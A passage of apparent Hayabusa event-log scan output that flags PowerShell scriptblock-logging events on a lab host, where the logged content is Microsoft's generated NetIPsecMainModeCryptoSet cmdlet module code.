(cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 